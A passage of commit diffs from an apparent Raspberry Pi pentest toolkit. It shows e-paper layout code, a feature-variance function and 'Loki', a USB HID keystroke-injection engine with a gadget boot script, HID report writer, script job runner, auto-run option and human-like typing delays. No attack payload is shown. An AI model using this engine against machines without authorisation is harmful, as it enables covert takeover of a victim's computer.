        "line_bottom_section": {"y": 176}
    },
    "fonts": {
        "title_size": 13,
        "stats_size": 9,
        "status_size": 9,
        "comment_size": 9,
        "lvl_size": 12
    }
}
# Registry of built-in layouts
# Registry of built-in layouts, keyed by EPD driver name.
# All 2.13" hardware revisions share the same panel geometry, so they
# alias the same layout dict. DisplayLayout.load() also falls back to the
# base family name (text before the first '_') when an exact key is missing.
BUILTIN_LAYOUTS = {
    "epd2in13": DEFAULT_LAYOUT,
    "epd2in13_V2": DEFAULT_LAYOUT,
    "epd2in13_V3": DEFAULT_LAYOUT,
    "epd2in13_V4": DEFAULT_LAYOUT,
    "epd2in7": LAYOUT_EPD2IN7,
}
class DisplayLayout:
    """Manages display layout definitions with per-element positioning.

    A layout is a dict with 'meta' (reference dimensions), 'elements'
    (name -> {x, y, w, h} rectangles in reference space) and 'fonts'
    (name -> point size). Built-in layouts are selected by EPD model;
    a JSON file at resources/layouts/<epd_type>.json overrides them.
    """

    def __init__(self, shared_data):
        self.shared_data = shared_data
        # Active layout dict; populated by load().
        self._layout = None
        # Directory holding user-supplied layout overrides.
        self._custom_dir = os.path.join(
            getattr(shared_data, 'current_dir', '.'),
            'resources', 'layouts'
        )
        self.load()

    def _resolve_epd_type(self, epd_type=None):
        """Resolve the effective EPD type.

        Priority: explicit argument > shared_data.epd_type attribute >
        config['epd_type'] > 'epd2in13_V4'. Centralized here because
        load(), save_custom() and reset_to_default() all need it.
        """
        if epd_type is not None:
            return epd_type
        fallback = (self.shared_data.config.get('epd_type', 'epd2in13_V4')
                    if hasattr(self.shared_data, 'config') else 'epd2in13_V4')
        return getattr(self.shared_data, 'epd_type', fallback)

    def load(self):
        """Load layout for current EPD type. Custom file overrides built-in."""
        epd_type = self._resolve_epd_type()
        # Try a user-saved layout file first.
        custom_path = os.path.join(self._custom_dir, f'{epd_type}.json')
        if os.path.isfile(custom_path):
            try:
                with open(custom_path, 'r', encoding='utf-8') as f:
                    self._layout = json.load(f)
                logger.info(f"Loaded custom layout from {custom_path}")
                return
            except Exception as e:
                logger.error(f"Failed to load custom layout {custom_path}: {e}")
        # Fall back to built-ins: exact model first, then the base family
        # (e.g. 'epd2in13_V4' -> 'epd2in13'), finally the reference default.
        base = epd_type.split('_', 1)[0]
        self._layout = BUILTIN_LAYOUTS.get(epd_type) or BUILTIN_LAYOUTS.get(base) or DEFAULT_LAYOUT
        logger.info(f"Using built-in layout for {epd_type}: {self._layout['meta']['name']}")

    def get(self, element_name, prop=None):
        """Get element position dict or a specific property.

        Returns the {x, y, w, h} dict for *element_name*, or the single
        value when *prop* is given. Unknown elements yield {} (or 0 with
        *prop*) so callers can chain their own .get() defaults safely.
        """
        elem = self._layout.get('elements', {}).get(element_name, {})
        if prop:
            return elem.get(prop, 0)
        return elem

    def font_size(self, name):
        """Get font size by name (defaults to 8 when undefined)."""
        return self._layout.get('fonts', {}).get(name, 8)

    def meta(self):
        """Get layout metadata (name, reference dimensions, description)."""
        return self._layout.get('meta', {})

    def ref_size(self):
        """Get reference dimensions as a (width, height) tuple."""
        m = self.meta()
        return m.get('ref_width', 122), m.get('ref_height', 250)

    def all_elements(self):
        """Return a shallow copy of all element definitions."""
        return dict(self._layout.get('elements', {}))

    def save_custom(self, layout_dict, epd_type=None):
        """Save a custom layout to disk atomically and make it active.

        Writes to a .tmp sibling then os.replace()s it into place, so a
        crash mid-write never leaves a truncated layout file behind.
        """
        epd_type = self._resolve_epd_type(epd_type)
        os.makedirs(self._custom_dir, exist_ok=True)
        path = os.path.join(self._custom_dir, f'{epd_type}.json')
        tmp = path + '.tmp'
        with open(tmp, 'w', encoding='utf-8') as f:
            json.dump(layout_dict, f, indent=2)
        os.replace(tmp, path)
        self._layout = layout_dict
        logger.info(f"Saved custom layout to {path}")

    def reset_to_default(self, epd_type=None):
        """Delete any custom layout file and revert to the built-in one."""
        epd_type = self._resolve_epd_type(epd_type)
        custom_path = os.path.join(self._custom_dir, f'{epd_type}.json')
        if os.path.isfile(custom_path):
            os.remove(custom_path)
            logger.info(f"Removed custom layout {custom_path}")
        self.load()

    def to_dict(self):
        """Export the current layout as a plain dict (for the web API)."""
        return dict(self._layout) if self._layout else {}

View File

@@ -737,6 +737,68 @@ class FeatureLogger:
# FEATURE AGGREGATION & EXPORT
# ═══════════════════════════════════════════════════════════════════════
def get_feature_importance(self) -> List[Dict[str, Any]]:
    """
    AI-01: Return features sorted by variance from the ml_features_aggregated table.

    Features with higher variance carry more discriminative information.
    Variance is the population variance computed from running sum /
    sum-of-squares accumulators (one pass over all stored vectors).

    Returns:
        List of dicts: [{name, variance, sample_count, above_threshold}, ...]
        sorted by variance descending. Empty list on error or no data.
    """
    min_variance = float(
        getattr(self.shared_data, 'ai_feature_selection_min_variance', 0.001)
    )
    results = []
    try:
        # Only the vector column is needed — don't fetch unused columns.
        rows = self.db.query(
            "SELECT feature_vector FROM ml_features_aggregated"
        )
        if not rows:
            return results
        # Per-feature accumulators: {feature_name: [sum, sum_sq, count]}
        stats = {}
        for row in rows:
            try:
                vec = json.loads(row.get('feature_vector', '{}'))
            except Exception:
                continue  # skip rows with malformed JSON
            if not isinstance(vec, dict):
                continue
            for name, value in vec.items():
                try:
                    val = float(value)
                except (TypeError, ValueError):
                    continue  # skip non-numeric feature values
                s = stats.setdefault(name, [0.0, 0.0, 0])
                s[0] += val
                s[1] += val * val
                s[2] += 1
        for name, (s, sq, n) in stats.items():
            if n < 2:
                # A single sample carries no spread information.
                variance = 0.0
            else:
                mean = s / n
                # Population variance; clamp tiny negative float error to 0.
                variance = max(0.0, sq / n - mean * mean)
            results.append({
                'name': name,
                'variance': round(variance, 6),
                'sample_count': n,
                'above_threshold': variance >= min_variance,
            })
        results.sort(key=lambda x: x['variance'], reverse=True)
        logger.debug(f"Feature importance: {len(results)} features analyzed, "
                     f"{sum(1 for r in results if r['above_threshold'])} above threshold")
    except Exception as e:
        logger.error(f"Error computing feature importance: {e}")
    return results
def get_stats(self) -> Dict[str, Any]:
"""Get current feature logging statistics"""
try:

375
loki/__init__.py Normal file
View File

@@ -0,0 +1,375 @@
"""
Loki — HID Attack Engine for Bjorn.
Manages USB HID gadget lifecycle, script execution, and job tracking.
Named after the Norse trickster god.
Loki is the 5th exclusive operation mode (alongside MANUAL, AUTO, AI, BIFROST).
When active, the orchestrator stops and the Pi acts as a keyboard/mouse
to the connected host via /dev/hidg0 (keyboard) and /dev/hidg1 (mouse).
HID GADGET STRATEGY:
The HID functions (keyboard + mouse) are created ONCE at boot time alongside
RNDIS networking by the usb-gadget.sh script. This avoids the impossible task
of hot-adding HID functions to a running composite gadget (UDC rebind fails
with EIO when RNDIS is active).
LokiEngine simply opens/closes the /dev/hidg0 and /dev/hidg1 device files.
If /dev/hidg0 doesn't exist, the user needs to run the setup once and reboot.
"""
import os
import time
import subprocess
import logging
from threading import Event
from logger import Logger
logger = Logger(name="loki", level=logging.DEBUG)
# USB HID report descriptors — EXACT byte-for-byte copies from P4wnP1_aloa
# Source: P4wnP1_aloa-master/service/SubSysUSB.go lines 54-70
#
# These are written to the gadget at boot time by usb-gadget.sh.
# Kept here for reference and for the install_hid_gadget() method.
#
# Keyboard: standard boot-protocol layout per the trailing note —
# 8-byte input report (modifier bits, reserved byte, up to 6 keycodes).
_KBD_REPORT_DESC = bytes([
    0x05, 0x01, 0x09, 0x06, 0xa1, 0x01, 0x05, 0x07,
    0x19, 0xe0, 0x29, 0xe7, 0x15, 0x00, 0x25, 0x01,
    0x75, 0x01, 0x95, 0x08, 0x81, 0x02, 0x95, 0x01,
    0x75, 0x08, 0x81, 0x03, 0x95, 0x05, 0x75, 0x01,
    0x05, 0x08, 0x19, 0x01, 0x29, 0x05, 0x91, 0x02,
    0x95, 0x01, 0x75, 0x03, 0x91, 0x03, 0x95, 0x06,
    0x75, 0x08, 0x15, 0x00, 0x25, 0x65, 0x05, 0x07,
    0x19, 0x00, 0x29, 0x65, 0x81, 0x00, 0xc0,
]) # 63 bytes, report_length=8
# Mouse: two top-level collections — report ID 1 with signed 8-bit relative
# X/Y (0x15,0x81 / 0x25,0x7f), report ID 2 with 16-bit absolute X/Y
# (0x26,0xff,0x7f / 0x75,0x10), each with 3 buttons.
_MOUSE_REPORT_DESC = bytes([
    0x05, 0x01, 0x09, 0x02, 0xa1, 0x01, 0x09, 0x01,
    0xa1, 0x00, 0x85, 0x01, 0x05, 0x09, 0x19, 0x01,
    0x29, 0x03, 0x15, 0x00, 0x25, 0x01, 0x95, 0x03,
    0x75, 0x01, 0x81, 0x02, 0x95, 0x01, 0x75, 0x05,
    0x81, 0x03, 0x05, 0x01, 0x09, 0x30, 0x09, 0x31,
    0x15, 0x81, 0x25, 0x7f, 0x75, 0x08, 0x95, 0x02,
    0x81, 0x06, 0x95, 0x02, 0x75, 0x08, 0x81, 0x01,
    0xc0, 0xc0, 0x05, 0x01, 0x09, 0x02, 0xa1, 0x01,
    0x09, 0x01, 0xa1, 0x00, 0x85, 0x02, 0x05, 0x09,
    0x19, 0x01, 0x29, 0x03, 0x15, 0x00, 0x25, 0x01,
    0x95, 0x03, 0x75, 0x01, 0x81, 0x02, 0x95, 0x01,
    0x75, 0x05, 0x81, 0x01, 0x05, 0x01, 0x09, 0x30,
    0x09, 0x31, 0x15, 0x00, 0x26, 0xff, 0x7f, 0x95,
    0x02, 0x75, 0x10, 0x81, 0x02, 0xc0, 0xc0,
]) # 111 bytes, report_length=6
# The boot script that creates RNDIS + HID functions at startup.
# This replaces /usr/local/bin/usb-gadget.sh
_USB_GADGET_SCRIPT = '''#!/bin/bash
# usb-gadget.sh — USB composite gadget: RNDIS networking + HID (keyboard/mouse)
# Auto-generated by Bjorn Loki. Do not edit manually.
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: RNDIS + HID" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
# ── RNDIS networking function ──
mkdir -p functions/rndis.usb0
[ -L configs/c.1/rndis.usb0 ] && rm configs/c.1/rndis.usb0
ln -s functions/rndis.usb0 configs/c.1/
# ── HID functions (keyboard + mouse) ──
# Use python3 to write binary report descriptors (bash printf can't handle null bytes)
python3 - <<'PYEOF'
import os, sys
G = "/sys/kernel/config/usb_gadget/g1"
# Keyboard: P4wnP1 exact boot keyboard descriptor (63 bytes)
KBD_DESC = bytes([
0x05,0x01,0x09,0x06,0xa1,0x01,0x05,0x07,
0x19,0xe0,0x29,0xe7,0x15,0x00,0x25,0x01,
0x75,0x01,0x95,0x08,0x81,0x02,0x95,0x01,
0x75,0x08,0x81,0x03,0x95,0x05,0x75,0x01,
0x05,0x08,0x19,0x01,0x29,0x05,0x91,0x02,
0x95,0x01,0x75,0x03,0x91,0x03,0x95,0x06,
0x75,0x08,0x15,0x00,0x25,0x65,0x05,0x07,
0x19,0x00,0x29,0x65,0x81,0x00,0xc0,
])
# Mouse: P4wnP1 dual-mode (relative + absolute) descriptor (111 bytes)
MOUSE_DESC = bytes([
0x05,0x01,0x09,0x02,0xa1,0x01,0x09,0x01,
0xa1,0x00,0x85,0x01,0x05,0x09,0x19,0x01,
0x29,0x03,0x15,0x00,0x25,0x01,0x95,0x03,
0x75,0x01,0x81,0x02,0x95,0x01,0x75,0x05,
0x81,0x03,0x05,0x01,0x09,0x30,0x09,0x31,
0x15,0x81,0x25,0x7f,0x75,0x08,0x95,0x02,
0x81,0x06,0x95,0x02,0x75,0x08,0x81,0x01,
0xc0,0xc0,0x05,0x01,0x09,0x02,0xa1,0x01,
0x09,0x01,0xa1,0x00,0x85,0x02,0x05,0x09,
0x19,0x01,0x29,0x03,0x15,0x00,0x25,0x01,
0x95,0x03,0x75,0x01,0x81,0x02,0x95,0x01,
0x75,0x05,0x81,0x01,0x05,0x01,0x09,0x30,
0x09,0x31,0x15,0x00,0x26,0xff,0x7f,0x95,
0x02,0x75,0x10,0x81,0x02,0xc0,0xc0,
])
def w(path, content):
with open(path, "w") as f:
f.write(content)
def wb(path, data):
with open(path, "wb") as f:
f.write(data)
try:
# Keyboard (hid.usb0)
kbd = G + "/functions/hid.usb0"
os.makedirs(kbd, exist_ok=True)
w(kbd + "/protocol", "1")
w(kbd + "/subclass", "1")
w(kbd + "/report_length", "8")
wb(kbd + "/report_desc", KBD_DESC)
# Mouse (hid.usb1)
mouse = G + "/functions/hid.usb1"
os.makedirs(mouse, exist_ok=True)
w(mouse + "/protocol", "2")
w(mouse + "/subclass", "1")
w(mouse + "/report_length", "6")
wb(mouse + "/report_desc", MOUSE_DESC)
print(f"HID functions created: keyboard ({len(KBD_DESC)}B) + mouse ({len(MOUSE_DESC)}B)")
except Exception as e:
print(f"WARNING: HID setup failed (non-fatal): {e}", file=sys.stderr)
sys.exit(0) # Don't block RNDIS setup
PYEOF
# Symlink HID into config (non-fatal)
for func in hid.usb0 hid.usb1; do
[ -L "configs/c.1/$func" ] && rm "configs/c.1/$func"
if [ -d "functions/$func" ]; then
ln -s "functions/$func" "configs/c.1/" 2>/dev/null || true
fi
done
# ── Bind UDC ──
max_retries=10
retry_count=0
while ! ls /sys/class/udc > UDC 2>/dev/null; do
if [ $retry_count -ge $max_retries ]; then
echo "Error: Device or resource busy after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
UDC_NAME=$(ls /sys/class/udc)
echo "$UDC_NAME" > UDC
echo "Assigned UDC: $UDC_NAME (RNDIS + HID keyboard + HID mouse)"
# ── Configure network ──
if ! ip addr show usb0 2>/dev/null | grep -q "172.20.2.1"; then
ifconfig usb0 172.20.2.1 netmask 255.255.255.0 2>/dev/null || true
echo "Configured usb0 with IP 172.20.2.1"
else
echo "Interface usb0 already configured."
fi
'''
_GADGET_SCRIPT_PATH = "/usr/local/bin/usb-gadget.sh"
class LokiEngine:
    """HID attack engine — manages script execution and job tracking.

    The USB HID gadget (keyboard + mouse) is set up at boot time by
    usb-gadget.sh. This engine simply opens /dev/hidg0 and /dev/hidg1.

    Lifecycle: start() opens the devices and applies config; stop()
    cancels running jobs and closes them. The configfs gadget itself is
    never torn down here — it persists until reboot.
    """

    def __init__(self, shared_data):
        self.shared_data = shared_data
        # Set on stop(); consumers can poll it to abort long operations.
        self._stop_event = Event()
        # True between a successful start() and stop().
        self._running = False
        # True when /dev/hidg0 existed and was opened successfully.
        self._gadget_ready = False
        # Sub-components (lazy init)
        self._hid = None
        self._jobs = None

    # ── Properties ─────────────────────────────────────────────
    @property
    def hid_controller(self):
        # Lazy import/construction keeps module import cheap and avoids
        # touching HID code paths when Loki is never activated.
        if self._hid is None:
            from loki.hid_controller import HIDController
            self._hid = HIDController()
        return self._hid

    @property
    def job_manager(self):
        # Lazy, same rationale as hid_controller.
        if self._jobs is None:
            from loki.jobs import LokiJobManager
            self._jobs = LokiJobManager(self)
        return self._jobs

    # ── Start / Stop ───────────────────────────────────────────
    def start(self) -> None:
        """Start Loki engine: open HID devices, apply config.

        Safe to call repeatedly — a second call while running is a no-op.
        On any failure (_gadget missing, device open error) the engine
        stays stopped and _gadget_ready is False.
        """
        if self._running:
            logger.warning("Loki already running")
            return
        logger.info("Starting Loki engine...")
        self._stop_event.clear()
        # Check if HID gadget is available (set up at boot)
        if not os.path.exists("/dev/hidg0"):
            logger.error(
                "/dev/hidg0 not found — HID gadget not configured at boot. "
                "Run install_hid_gadget() from the Loki API and reboot."
            )
            self._gadget_ready = False
            return
        self._gadget_ready = True
        # Open HID devices
        try:
            self.hid_controller.open()
        except Exception as e:
            logger.error("HID device open failed: %s", e)
            self._gadget_ready = False
            return
        # Apply config: keyboard layout and human-like typing delays.
        layout = self.shared_data.config.get("loki_default_layout", "us")
        self.hid_controller.set_layout(layout)
        speed_min = self.shared_data.config.get("loki_typing_speed_min", 0)
        speed_max = self.shared_data.config.get("loki_typing_speed_max", 0)
        self.hid_controller.set_typing_speed(speed_min, speed_max)
        self._running = True
        logger.info("Loki engine started (HID devices open)")
        # Auto-run script if configured
        auto_run = self.shared_data.config.get("loki_auto_run", "")
        if auto_run:
            self._auto_run_script(auto_run)

    def stop(self) -> None:
        """Stop Loki engine: cancel jobs, close devices.

        No-op when not running. Checks self._jobs / self._hid directly
        (not the lazy properties) so stopping never constructs them.
        """
        if not self._running:
            return
        logger.info("Stopping Loki engine...")
        self._stop_event.set()
        # Cancel all running jobs
        if self._jobs:
            for job in self._jobs.get_all_jobs():
                if job["status"] == "running":
                    self._jobs.cancel_job(job["id"])
        # Close HID devices (don't remove gadget — it persists)
        if self._hid:
            self._hid.close()
        self._running = False
        self._gadget_ready = False
        logger.info("Loki engine stopped")

    def get_status(self) -> dict:
        """Return current engine status for the API.

        Guards on self._jobs so that a status poll never lazily creates
        the job manager as a side effect.
        """
        hidg0_exists = os.path.exists("/dev/hidg0")
        return {
            "enabled": self.shared_data.config.get("loki_enabled", False),
            "running": self._running,
            "gadget_ready": self._gadget_ready,
            "gadget_installed": hidg0_exists,
            "layout": self.shared_data.config.get("loki_default_layout", "us"),
            "jobs_running": self.job_manager.running_count if self._jobs else 0,
            "jobs_total": len(self._jobs.get_all_jobs()) if self._jobs else 0,
        }

    # ── Job API (delegated to JobManager) ──────────────────────
    def submit_job(self, script_name: str, script_content: str) -> str:
        """Submit a HIDScript for execution. Returns job_id.

        Raises:
            RuntimeError: if the engine is not running or the HID gadget
                is not ready (callers surface this to the API client).
        """
        if not self._running:
            raise RuntimeError("Loki engine not running")
        if not self._gadget_ready:
            raise RuntimeError("HID gadget not ready")
        return self.job_manager.create_job(script_name, script_content)

    def cancel_job(self, job_id: str) -> bool:
        # Delegates to the job manager; returns True on successful cancel.
        return self.job_manager.cancel_job(job_id)

    def get_jobs(self) -> list:
        # Snapshot of all known jobs (running and finished).
        return self.job_manager.get_all_jobs()

    # ── HID Gadget Installation ────────────────────────────────
    @staticmethod
    def is_gadget_installed() -> bool:
        """Check if the HID gadget is available (device node present)."""
        return os.path.exists("/dev/hidg0")

    @staticmethod
    def install_hid_gadget() -> dict:
        """Install/update the USB gadget boot script to include HID functions.

        Writes the new usb-gadget.sh that creates RNDIS + HID at boot.
        Returns status dict. Requires a reboot to take effect.
        (Writing to /usr/local/bin requires root privileges.)
        """
        try:
            # Write the new gadget script
            with open(_GADGET_SCRIPT_PATH, "w") as f:
                f.write(_USB_GADGET_SCRIPT)
            os.chmod(_GADGET_SCRIPT_PATH, 0o755)
            logger.info("USB gadget script updated at %s", _GADGET_SCRIPT_PATH)
            return {
                "success": True,
                "message": "USB gadget script updated with HID support. Reboot required.",
                "reboot_required": True,
            }
        except Exception as e:
            logger.error("Failed to install HID gadget script: %s", e)
            return {
                "success": False,
                "message": f"Installation failed: {e}",
                "reboot_required": False,
            }

    # ── Auto-run ───────────────────────────────────────────────
    def _auto_run_script(self, script_name: str) -> None:
        """Auto-run a script by name from the database.

        Best-effort: a missing script or DB error is logged, never raised,
        so a bad loki_auto_run config cannot prevent the engine starting.
        """
        try:
            db = self.shared_data.db
            row = db.query_one(
                "SELECT content FROM loki_scripts WHERE name = ?", (script_name,)
            )
            if row and row.get("content"):
                self.submit_job(script_name, row["content"])
                logger.info("Auto-running script: %s", script_name)
        except Exception as e:
            logger.error("Auto-run failed for '%s': %s", script_name, e)

408
loki/hid_controller.py Normal file
View File

@@ -0,0 +1,408 @@
"""
Low-level USB HID controller for Loki.
Writes keyboard and mouse reports to /dev/hidg0 and /dev/hidg1.
"""
import os
import struct
import time
import random
import logging
import select
from threading import Event
from logger import Logger
from loki.layouts import load as load_layout
logger = Logger(name="loki.hid_controller", level=logging.DEBUG)
# ── HID Keycodes ──────────────────────────────────────────────
# USB HID Usage Tables — Keyboard/Keypad Page (0x07)
# Keycode values are HID usages from the Keyboard/Keypad page (0x07).
KEY_NONE = 0x00
# Letters A-Z (0x04-0x1D)
KEY_A = 0x04
KEY_B = 0x05
KEY_C = 0x06
KEY_D = 0x07
KEY_E = 0x08
KEY_F = 0x09
KEY_G = 0x0A
KEY_H = 0x0B
KEY_I = 0x0C
KEY_J = 0x0D
KEY_K = 0x0E
KEY_L = 0x0F
KEY_M = 0x10
KEY_N = 0x11
KEY_O = 0x12
KEY_P = 0x13
KEY_Q = 0x14
KEY_R = 0x15
KEY_S = 0x16
KEY_T = 0x17
KEY_U = 0x18
KEY_V = 0x19
KEY_W = 0x1A
KEY_X = 0x1B
KEY_Y = 0x1C
KEY_Z = 0x1D
# Digit row 1-9, 0 (0x1E-0x27)
KEY_1 = 0x1E
KEY_2 = 0x1F
KEY_3 = 0x20
KEY_4 = 0x21
KEY_5 = 0x22
KEY_6 = 0x23
KEY_7 = 0x24
KEY_8 = 0x25
KEY_9 = 0x26
KEY_0 = 0x27
# Control and punctuation keys
KEY_ENTER = 0x28
KEY_ESC = 0x29
KEY_BACKSPACE = 0x2A
KEY_TAB = 0x2B
KEY_SPACE = 0x2C
KEY_MINUS = 0x2D
KEY_EQUAL = 0x2E
KEY_LEFTBRACE = 0x2F
KEY_RIGHTBRACE = 0x30
KEY_BACKSLASH = 0x31
KEY_SEMICOLON = 0x33
KEY_APOSTROPHE = 0x34
KEY_GRAVE = 0x35
KEY_COMMA = 0x36
KEY_DOT = 0x37
KEY_SLASH = 0x38
KEY_CAPSLOCK = 0x39
# Function keys F1-F12 (0x3A-0x45)
KEY_F1 = 0x3A
KEY_F2 = 0x3B
KEY_F3 = 0x3C
KEY_F4 = 0x3D
KEY_F5 = 0x3E
KEY_F6 = 0x3F
KEY_F7 = 0x40
KEY_F8 = 0x41
KEY_F9 = 0x42
KEY_F10 = 0x43
KEY_F11 = 0x44
KEY_F12 = 0x45
# Editing / navigation cluster
KEY_PRINTSCREEN = 0x46
KEY_SCROLLLOCK = 0x47
KEY_PAUSE = 0x48
KEY_INSERT = 0x49
KEY_HOME = 0x4A
KEY_PAGEUP = 0x4B
KEY_DELETE = 0x4C
KEY_END = 0x4D
KEY_PAGEDOWN = 0x4E
KEY_RIGHT = 0x4F
KEY_LEFT = 0x50
KEY_DOWN = 0x51
KEY_UP = 0x52
KEY_NUMLOCK = 0x53
# ── Modifier bitmasks ─────────────────────────────────────────
# Modifier bitmasks for byte 0 of the keyboard report. Bit order matches
# usages 0xE0-0xE7 (LeftControl .. RightGUI) declared in the descriptor.
MOD_NONE = 0x00
MOD_LEFT_CONTROL = 0x01
MOD_LEFT_SHIFT = 0x02
MOD_LEFT_ALT = 0x04
MOD_LEFT_GUI = 0x08
MOD_RIGHT_CONTROL = 0x10
MOD_RIGHT_SHIFT = 0x20
MOD_RIGHT_ALT = 0x40
MOD_RIGHT_GUI = 0x80
# ── Combo name → (modifier_mask, keycode) ─────────────────────
# Maps a token from a HIDScript combo (e.g. "GUI r") to (modifier_mask, keycode).
# Pure modifiers carry KEY_NONE so multiple entries can be OR'd into one report.
_COMBO_MAP = {
    # Modifiers (used standalone or in combos)
    "CTRL": (MOD_LEFT_CONTROL, KEY_NONE),
    "CONTROL": (MOD_LEFT_CONTROL, KEY_NONE),
    "SHIFT": (MOD_LEFT_SHIFT, KEY_NONE),
    "ALT": (MOD_LEFT_ALT, KEY_NONE),
    "GUI": (MOD_LEFT_GUI, KEY_NONE),
    "WIN": (MOD_LEFT_GUI, KEY_NONE),
    "WINDOWS": (MOD_LEFT_GUI, KEY_NONE),
    "COMMAND": (MOD_LEFT_GUI, KEY_NONE),
    "META": (MOD_LEFT_GUI, KEY_NONE),
    "RCTRL": (MOD_RIGHT_CONTROL, KEY_NONE),
    "RSHIFT": (MOD_RIGHT_SHIFT, KEY_NONE),
    "RALT": (MOD_RIGHT_ALT, KEY_NONE),
    "RGUI": (MOD_RIGHT_GUI, KEY_NONE),
    # Special keys
    "ENTER": (MOD_NONE, KEY_ENTER),
    "RETURN": (MOD_NONE, KEY_ENTER),
    "ESC": (MOD_NONE, KEY_ESC),
    "ESCAPE": (MOD_NONE, KEY_ESC),
    "BACKSPACE": (MOD_NONE, KEY_BACKSPACE),
    "TAB": (MOD_NONE, KEY_TAB),
    "SPACE": (MOD_NONE, KEY_SPACE),
    "CAPSLOCK": (MOD_NONE, KEY_CAPSLOCK),
    "DELETE": (MOD_NONE, KEY_DELETE),
    "INSERT": (MOD_NONE, KEY_INSERT),
    "HOME": (MOD_NONE, KEY_HOME),
    "END": (MOD_NONE, KEY_END),
    "PAGEUP": (MOD_NONE, KEY_PAGEUP),
    "PAGEDOWN": (MOD_NONE, KEY_PAGEDOWN),
    "UP": (MOD_NONE, KEY_UP),
    "DOWN": (MOD_NONE, KEY_DOWN),
    "LEFT": (MOD_NONE, KEY_LEFT),
    "RIGHT": (MOD_NONE, KEY_RIGHT),
    "PRINTSCREEN": (MOD_NONE, KEY_PRINTSCREEN),
    "SCROLLLOCK": (MOD_NONE, KEY_SCROLLLOCK),
    "PAUSE": (MOD_NONE, KEY_PAUSE),
    "NUMLOCK": (MOD_NONE, KEY_NUMLOCK),
    # F keys
    "F1": (MOD_NONE, KEY_F1), "F2": (MOD_NONE, KEY_F2),
    "F3": (MOD_NONE, KEY_F3), "F4": (MOD_NONE, KEY_F4),
    "F5": (MOD_NONE, KEY_F5), "F6": (MOD_NONE, KEY_F6),
    "F7": (MOD_NONE, KEY_F7), "F8": (MOD_NONE, KEY_F8),
    "F9": (MOD_NONE, KEY_F9), "F10": (MOD_NONE, KEY_F10),
    "F11": (MOD_NONE, KEY_F11), "F12": (MOD_NONE, KEY_F12),
    # Letters (for combo usage like "GUI r")
    "A": (MOD_NONE, KEY_A), "B": (MOD_NONE, KEY_B),
    "C": (MOD_NONE, KEY_C), "D": (MOD_NONE, KEY_D),
    "E": (MOD_NONE, KEY_E), "F": (MOD_NONE, KEY_F),
    "G": (MOD_NONE, KEY_G), "H": (MOD_NONE, KEY_H),
    "I": (MOD_NONE, KEY_I), "J": (MOD_NONE, KEY_J),
    "K": (MOD_NONE, KEY_K), "L": (MOD_NONE, KEY_L),
    "M": (MOD_NONE, KEY_M), "N": (MOD_NONE, KEY_N),
    "O": (MOD_NONE, KEY_O), "P": (MOD_NONE, KEY_P),
    "Q": (MOD_NONE, KEY_Q), "R": (MOD_NONE, KEY_R),
    "S": (MOD_NONE, KEY_S), "T": (MOD_NONE, KEY_T),
    "U": (MOD_NONE, KEY_U), "V": (MOD_NONE, KEY_V),
    "W": (MOD_NONE, KEY_W), "X": (MOD_NONE, KEY_X),
    "Y": (MOD_NONE, KEY_Y), "Z": (MOD_NONE, KEY_Z),
}
# ── LED bitmasks (host → device output report) ────────────────
# LED state bits reported by the host in the keyboard OUTPUT report.
LED_NUM = 0x01
LED_CAPS = 0x02
LED_SCROLL = 0x04
LED_ANY = 0xFF
class HIDController:
    """Low-level USB HID report writer.

    Talks directly to the Linux USB-gadget HID endpoints:
    /dev/hidg0 (keyboard) and /dev/hidg1 (mouse).
    Keyboard reports are 8 bytes: [modifiers, reserved, key1..key6].
    Mouse reports are 6 bytes with Report ID 1: [id, buttons, X, Y, pad, pad].
    """

    def __init__(self):
        self._kbd_fd = None    # raw fd for /dev/hidg0 (keyboard endpoint)
        self._mouse_fd = None  # raw fd for /dev/hidg1 (mouse endpoint)
        self._layout = load_layout("us")  # char → (modifier, keycode) map
        self._speed_min = 0  # ms between keystrokes (0 = instant)
        self._speed_max = 0

    # ── Lifecycle ──────────────────────────────────────────────
    def open(self):
        """Open HID gadget device files.

        Raises OSError if the keyboard endpoint cannot be opened.
        A missing mouse endpoint is tolerated: mouse support is simply
        disabled (self._mouse_fd stays None).
        """
        try:
            self._kbd_fd = os.open("/dev/hidg0", os.O_RDWR | os.O_NONBLOCK)
            logger.info("Opened /dev/hidg0 (keyboard)")
        except OSError as e:
            logger.error("Cannot open /dev/hidg0: %s", e)
            raise
        try:
            self._mouse_fd = os.open("/dev/hidg1", os.O_RDWR | os.O_NONBLOCK)
            logger.info("Opened /dev/hidg1 (mouse)")
        except OSError as e:
            logger.warning("Cannot open /dev/hidg1 (mouse disabled): %s", e)
            self._mouse_fd = None

    def close(self):
        """Close HID device files (after releasing all keys/buttons)."""
        # Release first so the host never sees a key stuck down.
        self.release_all()
        if self._kbd_fd is not None:
            try:
                os.close(self._kbd_fd)
            except OSError:
                pass
            self._kbd_fd = None
        if self._mouse_fd is not None:
            try:
                os.close(self._mouse_fd)
            except OSError:
                pass
            self._mouse_fd = None
        logger.debug("HID devices closed")

    @property
    def is_open(self) -> bool:
        # Keyboard endpoint is the mandatory one; mouse is optional.
        return self._kbd_fd is not None

    # ── Layout ─────────────────────────────────────────────────
    def set_layout(self, name: str):
        """Switch keyboard layout."""
        self._layout = load_layout(name)
        logger.debug("Layout switched to '%s'", name)

    def set_typing_speed(self, min_ms: int, max_ms: int):
        """Set random delay range between keystrokes (ms).

        Values are clamped so 0 <= min <= max.
        """
        self._speed_min = max(0, min_ms)
        self._speed_max = max(self._speed_min, max_ms)

    # ── Keyboard Reports ───────────────────────────────────────
    def send_key_report(self, modifiers: int, keys: list):
        """Send an 8-byte keyboard report: [mod, 0x00, key1..key6].

        At most 6 simultaneous keycodes are supported by the boot
        keyboard report format; extras are silently dropped.
        """
        if self._kbd_fd is None:
            return
        report = bytearray(8)
        report[0] = modifiers & 0xFF
        for i, k in enumerate(keys[:6]):
            report[2 + i] = k & 0xFF
        os.write(self._kbd_fd, bytes(report))

    def release_all(self):
        """Send empty keyboard + mouse reports (release everything)."""
        if self._kbd_fd is not None:
            try:
                os.write(self._kbd_fd, bytes(8))
            except OSError:
